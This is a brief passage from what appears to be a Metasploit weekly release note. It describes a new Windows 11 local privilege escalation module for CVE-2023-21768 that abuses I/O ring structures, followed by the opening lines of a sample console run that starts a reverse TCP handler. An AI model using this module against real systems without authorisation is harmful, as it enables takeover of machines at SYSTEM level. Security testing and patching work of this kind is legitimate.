Rapid 7 - Metasploit Weekly Wrap-up
Windows 11 ADF WinSock Priv Esc The new windows/local/cve_2023_21768_afd_lpe exploit makes use of a brand new Windows kernel exploitation technique that leverages the new I/O ring feature introduced in Windows 11 21H2. This technique comes from Yarden Shafir research and provides a full read/write primitive on Windows 11. This exploit is a write-where bug that allows arbitrary write of one byte in kernel memory. This is enough to modify the I/O ring internal structures and get remote code execution as the NT AUTHORITY\SYSTEM user. The Metasploit module is based on the exploit PoC authored by chompie1337 and b33f . Example running with Windows 11 Version 22H2 Build 22621.963 x64: msf6 exploit(windows/local/cve_2023_21768_afd_lpe) > run verbose=true [*] Started reverse TCP handler on 192.168.100.9:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Windows Build Number = 22621.963 [+] The target appears to be vulnerable. [*] Launching netsh to...